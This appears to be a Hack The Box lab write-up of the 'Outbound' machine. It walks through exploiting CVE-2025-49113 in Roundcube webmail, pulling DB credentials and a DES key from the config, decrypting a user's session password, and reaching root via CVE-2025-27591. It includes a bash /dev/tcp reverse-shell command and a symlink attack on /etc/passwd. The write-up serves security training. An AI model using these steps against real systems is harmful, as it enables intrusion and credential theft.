HTB Outbound

Executive Summary

This is a Hack The Box machine writeup for Outbound. In this machine, I used nmap to discover details about the target IP address, identified a CVE affecting the Roundcube webmail application, extracted encrypted passwords from the database, decrypted them, and gained SSH access to retrieve the flags.

Discovery

Nmap Scanning

I was given an IP address: 10.10.11.77.

I ran nmap to scan for all information on this IP address:

nmap -sC -sV -Pn 10.10.11.77

Command Breakdown:

• -sC: Runs default NSE (Nmap Scripting Engine) scripts. These scripts perform common vulnerability checks, service enumeration, and gather additional information about detected services.
• -sV: Enables version detection. Probes open ports to determine service/version info (what software is running and its version).
• -Pn: Treats all hosts as online, skipping host discovery. This bypasses ping probes and assumes the target is up, useful when ICMP is blocked.

┌──(global_venv)─(w_11㉿kali)-[~]
└─$ nmap -sC -sV -Pn 10.10.11.77
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-03 02:10 +08
Nmap scan report for 10.10.11.77
Host is up (0.42s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.97 seconds

Adding Hosts Entry

We discovered that the web server redirects to http://mail.outbound.htb/

Then, I added this to the hosts file so that our system knows to connect to 10.10.11.77 when we visit mail.outbound.htb in the browser:

sudo sh -c 'echo "10.10.11.77 mail.outbound.htb outbound.htb" >> /etc/hosts'

Exploitation

Identifying Roundcube Webmail

After visiting the website and signing in using the user credentials provided, we can see the webmail interface.

I inspected all the functions in the webmail and found that the version of this webmail is shown in the “About” section.

Finding CVE-2025-49113

Finding CVE-2025-49113

I performed a Google search for CVEs or vulnerabilities for this version and found something interesting:

• CVE: https://www.offsec.com/blog/cve-2025-49113/

According to the website, “Affected Versions: All versions prior to 1.5.10, 1.6.11” — which means our Roundcube Webmail 1.6.10 is an affected version.

Exploiting the Vulnerability

After reading through the report blog, I found an exploit script at https://github.com/fearsoff-org/CVE-2025-49113 which can help exploit the webmail before the patched version.

I cloned the repo and prepared to run the exploit script.

Before running the script, set up a netcat listener:

nc -nlvp 4444

Then run the exploit:

php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 'bash -c "bash -i >& /dev/tcp/10.10.14.240/4444 0>&1"'

Gaining Initial Access

We successfully gained access to the server:

┌──(global_venv)─(w_11㉿kali)-[~]
└─$ nc -nlvp 4444                
listening on [any] 4444 ...
connect to [10.10.14.240] from (UNKNOWN) [10.10.11.77] 37810
bash: cannot set terminal process group (257): Inappropriate ioctl for device
bash: no job control in this shell
www-data@mail:/var/www/html/roundcube/public_html$ ls
ls
index.php
plugins
program
roundcube
skins
www-data@mail:/var/www/html/roundcube/public_html$ cat index.php
cat index.php
<?php

/*
 +-----------------------------------------------------------------------+
 | Roundcube Webmail IMAP Client                                         |
 | Version 1.6.10                                                       |
 |                                                                       |
 | Copyright (C) The Roundcube Dev Team                                  |
 |                                                                       |
 | Licensed under the GNU General Public License version 3 or            |
 | any later version with exceptions for skins & plugins.                |
 | See the README file for a full license statement.                     |
 |                                                                       |
 | PURPOSE:                                                              |
 |   This is the public entry point for all HTTP requests to the         |
 |   Roundcube webmail application.                                      |
 +-----------------------------------------------------------------------+
 | Author: Thomas Bruederli <roundcube@gmail.com>                        |
 | Author: Aleksander Machniak <alec@alec.pl>                            |
 +-----------------------------------------------------------------------+
*/

define('INSTALL_PATH', realpath(__DIR__ . '/..') . '/');

// include index.php from application root directory
include INSTALL_PATH . 'index.php';
www-data@mail:/var/www/html/roundcube/public_html$

Enumeration

Exploring the File System

We can see that there are several files inside. Let me navigate to the configuration directory:

www-data@mail:/var/www/html/roundcube/public_html$ ls
index.php
plugins
program
roundcube
skins
www-data@mail:/var/www/html/roundcube/public_html$ cd roundcube

www-data@mail:/var/www/html/roundcube/public_html/roundcube$ ls
CHANGELOG.md
INSTALL
LICENSE
README.md
SECURITY.md
SQL
UPGRADING
bin
composer.json
composer.lock
config
index.php
logs
plugins
program
public_html
skins
temp
vendor
www-data@mail:/var/www/html/roundcube/public_html/roundcube$ cd config/

www-data@mail:/var/www/html/roundcube/public_html/roundcube/config$ ls
config.inc.php
config.inc.php.sample
defaults.inc.php
mimetypes.php

Finding Configuration Files

I opened config.inc.php to look for sensitive information:

www-data@mail:/var/www/html/roundcube/public_html/roundcube/config$ cat con
<be/public_html/roundcube/config$ cat config.inc.php                       
<?php

/*
 +-----------------------------------------------------------------------+
 | Local configuration for the Roundcube Webmail installation.           |
 |                                                                       |
 | This is a sample configuration file only containing the minimum       |
 | setup required for a functional installation. Copy more options       |
 | from defaults.inc.php to this file to override the defaults.          |
 |                                                                       |
 | This file is part of the Roundcube Webmail client                     |
 | Copyright (C) The Roundcube Dev Team                                  |
 |                                                                       |
 | Licensed under the GNU General Public License version 3 or            |
 | any later version with exceptions for skins & plugins.                |
 | See the README file for a full license statement.                     |
 +-----------------------------------------------------------------------+
*/

$config = [];

// Database connection string (DSN) for read+write operations
// Format (compatible with PEAR MDB2): db_provider://user:password@host/database
// Currently supported db_providers: mysql, pgsql, sqlite, mssql, sqlsrv, oracle
// For examples see http://pear.php.net/manual/en/package.database.mdb2.intro-dsn.php
// NOTE: for SQLite use absolute path (Linux): 'sqlite:////full/path/to/sqlite.db?mode=0646'
//       or (Windows): 'sqlite:///C:/full/path/to/sqlite.db'
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';

// IMAP host chosen to perform the log-in.
// See defaults.inc.php for the option description.
$config['imap_host'] = 'localhost:143';

// SMTP server host (for sending mails).
// See defaults.inc.php for the option description.
$config['smtp_host'] = 'localhost:587';

// SMTP username (if required) if you use %u as the username Roundcube
// will use the current username for login
$config['smtp_user'] = '%u';

// SMTP password (if required) if you use %p as the password Roundcube
// will use the current user's password for login
$config['smtp_pass'] = '%p';

// provide an URL where a user can get support for this Roundcube installation
// PLEASE DO NOT LINK TO THE ROUNDCUBE.NET WEBSITE HERE!
$config['support_url'] = '';

// Name your service. This is displayed on the login screen and in the window title
$config['product_name'] = 'Roundcube Webmail';

// This key is used to encrypt the users imap password which is stored
// in the session record. For the default cipher method it must be
// exactly 24 characters long.
// YOUR KEY MUST BE DIFFERENT THAN THE SAMPLE VALUE FOR SECURITY REASONS
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

// List of active plugins (in plugins/ directory)
$config['plugins'] = [
    'archive',
    'zipdownload',
];

// skin name: folder from skins/
$config['skin'] = 'elastic';
$config['default_host'] = 'localhost';
$config['smtp_server'] = 'localhost';

Key findings:

• Database credentials: mysql://roundcube:RCDBPass2025@localhost/roundcube
• DES encryption key: rcmail-!24ByteDESkey*Str (This is used to encrypt passwords!)

Accessing the MySQL Database

In the configuration, I also found database connection details:

$config['db_dsnw'] = 'mysql://roundcube:@localhost/roundcubemail';

This indicates that there is a MySQL database available. Let’s access it:

mysql -u roundcube -pRCDBPass2025 roundcube

Extracting User Data

Once connected to the database, I queried for user information:

Extracting User Data

Once connected to the database, I queried for user information:

USE roundcube;
SELECT * FROM users;
SELECT * FROM session;

User table results:

user_id username        mail_host       created last_login      failed_login    failed_login_counter    language        preferences
1       jacob   localhost       2025-06-07 13:55:18     2025-06-11 07:52:49     2025-06-11 07:51:32     1       en_US   a:1:{s:11:"client_hash";s:16:"hpLLqLwmqbyihpi7";}
2       mel     localhost       2025-06-08 12:04:51     2025-06-08 13:29:05     NULL    NULL    en_US   a:1:{s:11:"client_hash";s:16:"GCrPGMkZvbsnc3xv";}
3       tyler   localhost       2025-06-08 13:28:55     2025-10-02 19:12:19     2025-06-11 07:51:22     1       en_US   a:2:{s:11:"client_hash";s:16:"AB3l7IenOCdOe3Q8";i:0;b:0;}

Here we discovered that jacob is a user with an early login date of 2025-06-07. Let’s investigate his session data.

Finding Encrypted Password

I found jacob’s session data containing an encrypted password:

6a5ktqih5uca6lj8vrmgh9v0oh      2025-06-08 15:46:40     172.17.0.1      bGFuZ3VhZ2V8czo1OiJlbl9VUyI7aW1hcF9uYW1lc3BhY2V8YTo0OntzOjg6InBlcnNvbmFsIjthOjE6e2k6MDthOjI6e2k6MDtzOjA6IiI7aToxO3M6MToiLyI7fX1zOjU6Im90aGVyIjtOO3M6Njoic2hhcmVkIjtOO3M6MTA6InByZWZpeF9vdXQiO3M6MDoiIjt9aW1hcF9kZWxpbWl0ZXJ8czoxOiIvIjtpbWFwX2xpc3RfY29uZnxhOjI6e2k6MDtOO2k6MTthOjA6e319dXNlcl9pZHxpOjE7dXNlcm5hbWV8czo1OiJqYWNvYiI7c3RvcmFnZV9ob3N0fHM6OToibG9jYWxob3N0IjtzdG9yYWdlX3BvcnR8aToxNDM7c3RvcmFnZV9zc2x8YjowO3Bhc3N3b3JkfHM6MzI6Ikw3UnYwMEE4VHV3SkFyNjdrSVR4eGNTZ25JazI1QW0vIjtsb2dpbl90aW1lfGk6MTc0OTM5NzExOTt0aW1lem9uZXxzOjEzOiJFdXJvcGUvTG9uZG9uIjtTVE9SQUdFX1NQRUNJQUwtVVNFfGI6MTthdXRoX3NlY3JldHxzOjI2OiJEcFlxdjZtYUk5SHhETDVHaGNDZDhKYVFRVyI7cmVxdWVzdF90b2tlbnxzOjMyOiJUSXNPYUFCQTF6SFNYWk9CcEg2dXA1WEZ5YXlOUkhhdyI7dGFza3xzOjQ6Im1haWwiO3NraW5fY29uZmlnfGE6Nzp7czoxNzoic3VwcG9ydGVkX2xheW91dHMiO2E6MTp7aTowO3M6MTA6IndpZGVzY3JlZW4iO31zOjIyOiJqcXVlcnlfdWlfY29sb3JzX3RoZW1lIjtzOjk6ImJvb3RzdHJhcCI7czoxODoiZW1iZWRfY3NzX2xvY2F0aW9uIjtzOjE3OiIvc3R5bGVzL2VtYmVkLmNzcyI7czoxOToiZWRpdG9yX2Nzc19sb2NhdGlvbiI7czoxNzoiL3N0eWxlcy9lbWJlZC5jc3MiO3M6MTc6ImRhcmtfbW9kZV9zdXBwb3J0IjtiOjE7czoyNjoibWVkaWFfYnJvd3Nlcl9jc3NfbG9jYXRpb24iO3M6NDoibm9uZSI7czoyMToiYWRkaXRpb25hbF9sb2dvX3R5cGVzIjthOjM6e2k6MDtzOjQ6ImRhcmsiO2k6MTtzOjU6InNtYWxsIjtpOjI7czoxMDoic21hbGwtZGFyayI7fX1pbWFwX2hvc3R8czo5OiJsb2NhbGhvc3QiO3BhZ2V8aToxO21ib3h8czo1OiJJTkJPWCI7c29ydF9jb2x8czowOiIiO3NvcnRfb3JkZXJ8czo0OiJERVNDIjtTVE9SQUdFX1RIUkVBRHxhOjM6e2k6MDtzOjEwOiJSRUZFUkVOQ0VTIjtpOjE7czo0OiJSRUZTIjtpOjI7czoxNDoiT1JERVJFRFNVQkpFQ1QiO31TVE9SQUdFX1FVT1RBfGI6MDtTVE9SQUdFX0xJU1QtRVhURU5ERUR8YjoxO2xpc3RfYXR0cmlifGE6Njp7czo0OiJuYW1lIjtzOjg6Im1lc3NhZ2VzIjtzOjI6ImlkIjtzOjExOiJtZXNzYWdlbGlzdCI7czo1OiJjbGFzcyI7czo0MjoibGlzdGluZyBtZXNzYWdlbGlzdCBzb3J0aGVhZGVyIGZpeGVkaGVhZGVyIjtzOjE1OiJhcmlhLWxhYmVsbGVkYnkiO3M6MjI6ImFyaWEtbGFiZWwtbWVzc2FnZWxpc3QiO3M6OToiZGF0YS1saXN0IjtzOjEyOiJtZXNzYWdlX2xpc3QiO3M6MTQ6ImRhdGEtbGFiZWwtbXNnIjtzOjE4OiJUaGUgbGlzdCBpcyBlbXB0eS4iO311bnNlZW5fY291bnR8YToyOntzOjU6IklOQk9YIjtpOjI7czo1OiJUcmFzaCI7aTowO31mb2xkZXJzfGE6MTp7czo1OiJJTkJPWCI7YToyOntzOjM6ImNudCI7aToyO3M6NjoibWF4dWlkIjtpOjM7fX1saXN0X21vZF9zZXF8czoyOiIxMCI7

Password Decryption

Decoding the Session Data

I found something interesting. I used CyberChef to decode the Base64 session data and found:

é®d¶¨¡æçêXü¾¹ ‡Ûô¢´Û4ì
<מ:ãM{Ûí{ûOµlanguage|s:5:"en_US";imap_namespace|a:4:{s:8:"personal";a:1:{i:0;a:2:{i:0;s:0:"";i:1;s:1:"/";}}s:5:"other";N;s:6:"shared";N;s:10:"prefix_out";s:0:"";}imap_delimiter|s:1:"/";imap_list_conf|a:2:{i:0;N;i:1;a:0:{}}user_id|i:1;username|s:5:"jacob";storage_host|s:9:"localhost";storage_port|i:143;storage_ssl|b:0;password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/";login_time|i:1749397119;timezone|s:13:"Europe/London";STORAGE_SPECIAL-USE|b:1;auth_secret|s:26:"DpYqv6maI9HxDL5GhcCd8JaQQW";request_token|s:32:"TIsOaABA1zHSXZOBpH6up5XFyayNRHaw";task|s:4:"mail";skin_config|a:7:{s:17:"supported_layouts";a:1:{i:0;s:10:"widescreen";}s:22:"jquery_ui_colors_theme";s:9:"bootstrap";s:18:"embed_css_location";s:17:"/styles/embed.css";s:19:"editor_css_location";s:17:"/styles/embed.css";s:17:"dark_mode_support";b:1;s:26:"media_browser_css_location";s:4:"none";s:21:"additional_logo_types";a:3:{i:0;s:4:"dark";i:1;s:5:"small";i:2;s:10:"small-dark";}}imap_host|s:9:"localhost";page|i:1;mbox|s:5:"INBOX";sort_col|s:0:"";sort_order|s:4:"DESC";STORAGE_THREAD|a:3:{i:0;s:10:"REFERENCES";i:1;s:4:"REFS";i:2;s:14:"ORDEREDSUBJECT";}STORAGE_QUOTA|b:0;STORAGE_LIST-EXTENDED|b:1;list_attrib|a:6:{s:4:"name";s:8:"messages";s:2:"id";s:11:"messagelist";s:5:"class";s:42:"listing messagelist sortheader fixedheader";s:15:"aria-labelledby";s:22:"aria-label-messagelist";s:9:"data-list";s:12:"message_list";s:14:"data-label-msg";s:18:"The list is empty.";}unseen_count|a:2:{s:5:"INBOX";i:2;s:5:"Trash";i:0;}folders|a:1:{s:5:"INBOX";a:2:{s:3:"cnt";i:2;s:6:"maxuid";i:3;}}list_mod_seq|s:2:"10";

Aha! We found the encrypted password:

password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"

Method 1: Using Roundcube Decrypt Script

Now we need to decrypt it since it was encrypted using DES. I found the official decryption script from Roundcube:

• Script: https://github.com/roundcube/roundcubemail/blob/master/bin/decrypt.sh

Run the decryption:

php decrypt.sh "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"

Decrypted password:

595mO8DmwGeD

Method 2: Using CyberChef (Alternative)

I also found another method to decrypt the password using CyberChef, although it’s harder compared to the script provided.

Step 1: Paste the encrypted password in CyberChef and convert it to hex:

Step 2: Copy the first 8 hex values and use Triple DES decryption in CyberChef with the secret key we found earlier (rcmail-!24ByteDESkey*Str):

Result: We get the same password:

595mO8DmwGeD

User Access

SSH Login as Jacob

After that, I signed in to SSH using the username jacob and the password we just decrypted:

┌──(global_venv)─(w_11㉿kali)-[~]
└─$ ssh jacob@10.10.11.77                
The authenticity of host '10.10.11.77 (10.10.11.77)' can't be established.
ED25519 key fingerprint is SHA256:OZNUeTZ9jastNKKQ1tFXatbeOZzSFg5Dt7nhwhjorR0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.77' (ED25519) to the list of known hosts.
jacob@10.10.11.77's password: 
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-63-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Thu Oct  2 07:27:26 PM UTC 2025

  System load:  0.1               Processes:             255
  Usage of /:   74.5% of 6.73GB   Users logged in:       0
  Memory usage: 11%               IPv4 address for eth0: 10.10.11.77
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Oct  2 18:50:00 2025 from 10.10.14.18
jacob@outbound:~$ 

Capturing User Flag

After successfully logging in, I used cat on user.txt and found the first flag!

jacob@outbound:~$ ls
exploit.py  exploit.sh  snapshot_01759431961_01759431961.nQJACc  user.txt
jacob@outbound:~$ cat user.txt
2e3eb95d86354c4825e2165a67654448

Flag One: 2e3eb95d86354c4825e2165a67654448

---

Privilege Escalation

Discovering Exploit Files

For the second flag, we need to gain root access to the server.

Interestingly, I noticed there are exploit.py and exploit.sh files in jacob’s home directory. These shouldn’t normally be there—perhaps they were left behind from a previous attempt or are part of the challenge.

Exploiting CVE-2025-27591

I decided to run the Python exploit that was conveniently available:

jacob@outbound:~$ python3 exploit.py
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] /var/log/below/error_root.log is a regular file. Removing it...
[+] Symlink created: /var/log/below/error_root.log -> /etc/passwd
[+] Target is vulnerable.
[*] Starting exploitation...
[+] Wrote malicious passwd line to /tmp/attacker
[+] Symlink set: /var/log/below/error_root.log -> /etc/passwd
[*] Executing 'below record' as root to trigger logging...
Oct 02 20:04:11.074 DEBG Starting up!
Oct 02 20:04:11.074 ERRO 
----------------- Detected unclean exit ---------------------
Error Message: Failed to acquire file lock on index file: /var/log/below/store/index_01759363200: EAGAIN: Try again
-------------------------------------------------------------
[+] 'below record' executed.
[*] Appending payload into /etc/passwd via symlink...
[+] Payload appended successfully.
[*] Attempting to switch to root shell via 'su attacker'...

Gaining Root Access

The exploit successfully ran and I gained root access!

The exploit leveraged CVE-2025-27591, which appears to be a vulnerability related to /var/log/below being world-writable, allowing a symlink attack on /etc/passwd to inject a malicious user with root privileges.

Capturing Root Flag

After gaining root access, I located and read the root flag:

cat /root/root.txt

Flag Two: f164ba6f0d37293719d9fa86b8f95cc8

---

Summary

This machine involved:

1. Reconnaissance: Using nmap to discover open ports and services
2. Vulnerability Identification: Finding CVE-2025-49113 affecting Roundcube Webmail 1.6.10
3. Initial Exploitation: Using the CVE exploit to gain www-data access
4. Enumeration: Discovering database credentials and DES encryption keys in configuration files
5. Password Extraction: Querying MySQL database to find encrypted passwords
6. Decryption: Using Roundcube’s decrypt script or CyberChef to decrypt DES-encrypted passwords
7. User Access: SSH login as jacob using decrypted credentials
8. Privilege Escalation: Exploiting CVE-2025-27591 for root access

Flags obtained:

• User Flag: 2e3eb95d86354c4825e2165a67654448
• Root Flag: f164ba6f0d37293719d9fa86b8f95cc8